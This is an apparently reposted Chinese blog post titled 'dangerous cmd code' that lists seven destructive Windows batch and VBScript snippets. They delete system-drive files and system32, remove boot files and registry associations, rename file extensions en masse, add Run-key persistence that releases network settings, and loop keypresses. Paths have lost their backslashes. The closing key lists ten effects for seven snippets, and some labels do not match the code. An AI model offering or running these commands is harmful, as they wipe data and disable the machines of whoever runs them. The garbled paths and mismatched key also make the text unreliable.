危险的cmd代码

1
@echo off
del %systemdrive%*.*/f /s /q
shutdown -r -f -t 00
2
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
3
del c:WINDOWSsystem32*.*/q
4
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoesec.bat
attrib -r -s -h c:oot.ini
del c:oot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
5
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
6
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowawimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn.bat
PAUSE
7
Set wshShell=wscript.CreateObject("Wscript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


1 蓝屏死机
2 更改文件后缀名
3 删除system32
4 使PC永久崩溃
5 删除所以的注册表
6 永远禁用网络
7 一直按回车
8 启动电脑后自动关机
9 开启CD蜂鸣器
10 格式化硬盘
原文地址:https://www.cnblogs.com/AmosAlbert/p/12832369.html